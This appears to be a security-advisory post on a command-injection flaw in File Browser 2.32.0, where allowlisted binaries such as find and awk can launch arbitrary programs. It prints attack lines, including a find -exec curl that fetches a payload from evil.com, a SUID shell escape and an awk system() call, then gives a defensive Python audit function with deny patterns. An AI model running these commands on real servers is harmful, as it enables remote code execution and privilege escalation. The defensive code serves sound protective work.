How the CVE Works
File Browser restricts command execution to a predefined allowlist, but many Linux commands (e.g., `find`, `awk`, `sed`) can launch further programs through flags or script constructs such as find's `-exec`. A user who holds the “Execute Commands” permission can bypass the allowlist by injecting such a subcommand into an otherwise permitted command. For example:
`find . -exec curl http://evil.com/exploit.sh -o /tmp/exploit \;`
This executes arbitrary code under the server’s UID. Common binaries in File Browser’s container (e.g., `tar`, `python`) widen the set of allowlisted programs that can be abused this way.
DailyCVE Form
Platform: File Browser
Version: 2.32.0
Vulnerability: Command Injection
Severity: Critical
Date: 2025-03-26
Prediction: Patch by 2025-07-10
What Undercode Says
Analytics:
- `prlimit --nproc=0 find . -exec sh -c 'malicious' \;` : Blocks fork
- `grep -r "allowlist" /etc/filebrowser/` : Audit config
Exploit:
- `find / -perm -4000 -exec /bin/sh \;` : SUID escape
- `awk 'BEGIN {system("id")}'` : Shell via awk
Protection:
- Disable “Execute Commands” globally.
- Use `prlimit --nproc=0` for all commands.
- Migrate to distroless containers.
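The allowlist gap described under “How the CVE Works” and the first protection item above can be narrowed with a pre-execution audit that rejects subcommand-capable flags before a command reaches the shell. The following Python is an added example written for this post, not File Browser’s own code. The allowlist, the per-binary flag sets and the sample command lines are constructed assumptions: the GNU tar options and GNU sed’s `--sandbox` mode are real, but the lists are illustrative and not exhaustive, so treat the function as a layer on top of disabling “Execute Commands”, not a replacement for it.

```python
import re
import shlex
from os.path import basename
from typing import Tuple

# Constructed allowlist modelled on an "Execute Commands" setup; not File Browser's own config.
ALLOWED_BINARIES = {"ls", "cat", "find", "awk", "sed", "tar"}

# Flags and script constructs that let an allowlisted binary launch another program.
# Illustrative, not exhaustive (assumption).
FIND_EXEC_FLAGS = {"-exec", "-execdir", "-ok", "-okdir"}
TAR_EXEC_OPTS = ("--to-command", "--use-compress-program", "-I",
                 "--rmt-command", "--checkpoint-action")
# awk constructs that spawn a process: system("..."), print | "cmd", "cmd" | getline
AWK_EXEC_RE = re.compile(r'system\s*\(|\|\s*&?\s*"|"\s*\|\s*&?\s*getline')
# Unescaped chaining/substitution in the raw line: ; | & $( and backticks
SHELL_META_RE = re.compile(r'(?<!\\)[;|&]|\$\(|`')


def audit_command(cmdline: str) -> Tuple[bool, str]:
    """Return (allowed, reason); reason names the construct that caused a rejection."""
    if SHELL_META_RE.search(cmdline):
        return False, "shell metacharacter in raw command line"
    try:
        argv = shlex.split(cmdline)
    except ValueError as exc:
        return False, f"unparseable command line: {exc}"
    if not argv:
        return False, "empty command"
    binary = basename(argv[0])
    if binary not in ALLOWED_BINARIES:
        return False, f"binary not allowlisted: {binary}"
    args = argv[1:]
    if binary == "find":
        hit = FIND_EXEC_FLAGS.intersection(args)
        if hit:
            return False, f"find subcommand flag: {sorted(hit)[0]}"
    elif binary == "tar":
        for arg in args:
            if arg.startswith(TAR_EXEC_OPTS):
                return False, f"tar subcommand option: {arg}"
    elif binary == "awk":
        for arg in args:
            if AWK_EXEC_RE.search(arg):
                return False, "awk program spawns a process"
    elif binary == "sed":
        # GNU sed --sandbox rejects the e/r/w commands that execute programs or write files.
        if "--sandbox" not in args:
            return False, "sed without --sandbox"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample lines; the first two are the advisory's own examples.
    samples = [
        "find . -exec curl http://evil.com/exploit.sh -o /tmp/exploit \\;",
        "awk 'BEGIN {system(\"id\")}'",
        "find /srv/files -name '*.log' -mtime +7",
        "sed -n 1,5p notes.txt",
        "sed --sandbox -n 1,5p notes.txt",
        "tar -cf backup.tar --to-command=/bin/sh docs",
        "ls; id",
    ]
    for line in samples:
        print(audit_command(line), "<-", line)
```

The raw-line metacharacter check runs before tokenising because `shlex.split` would otherwise fold an unescaped `;` into a word and hide command chaining; the escaped `\;` that terminates a find action is left alone, and the `-exec` flag itself is what triggers the rejection in that case.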
Impact:
- Full server compromise.
- UID privilege escalation.
- Data exfiltration.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode